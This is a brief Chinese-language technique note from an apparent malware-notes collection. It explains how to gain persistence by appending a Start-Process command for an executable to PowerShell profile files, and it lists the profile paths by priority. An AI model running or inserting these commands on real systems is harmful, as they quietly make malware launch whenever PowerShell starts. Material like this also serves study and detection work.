M
M
Malware Note
搜索文档…
滥用POWERSHELL配置文件
PowerShell启动时会执行配置文件的内容。
Powershell:
echo $profile
Test-Path $profile
New-Item -Path $profile -Type File –Force
$string = 'Start-Process "C:\Temp\qwqdanchun.exe"'
$string | Out-File -FilePath "%HOMEPATH%\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append
注:Powershell默认配置文件有多个,按照从上到下的顺序优先级从高到低
Description
Path
All Users, All Hosts
$PSHOME\Profile.ps1
All Users, Current Host
$PSHOME\Microsoft.PowerShell_profile.ps1
Current User, All Hosts
$Home[My ]Documents\PowerShell\Profile.ps1
Current user, Current Host
$Home[My ]Documents\PowerShell\Microsoft.PowerShell_profile.ps1
参考文章:
GitHub - enigma0x3/PowershellProfile: Abuses Powershell Profiles
GitHub
Abusing Powershell Profiles
enigma0x3
about Profiles - PowerShell
docsmsft
复制链接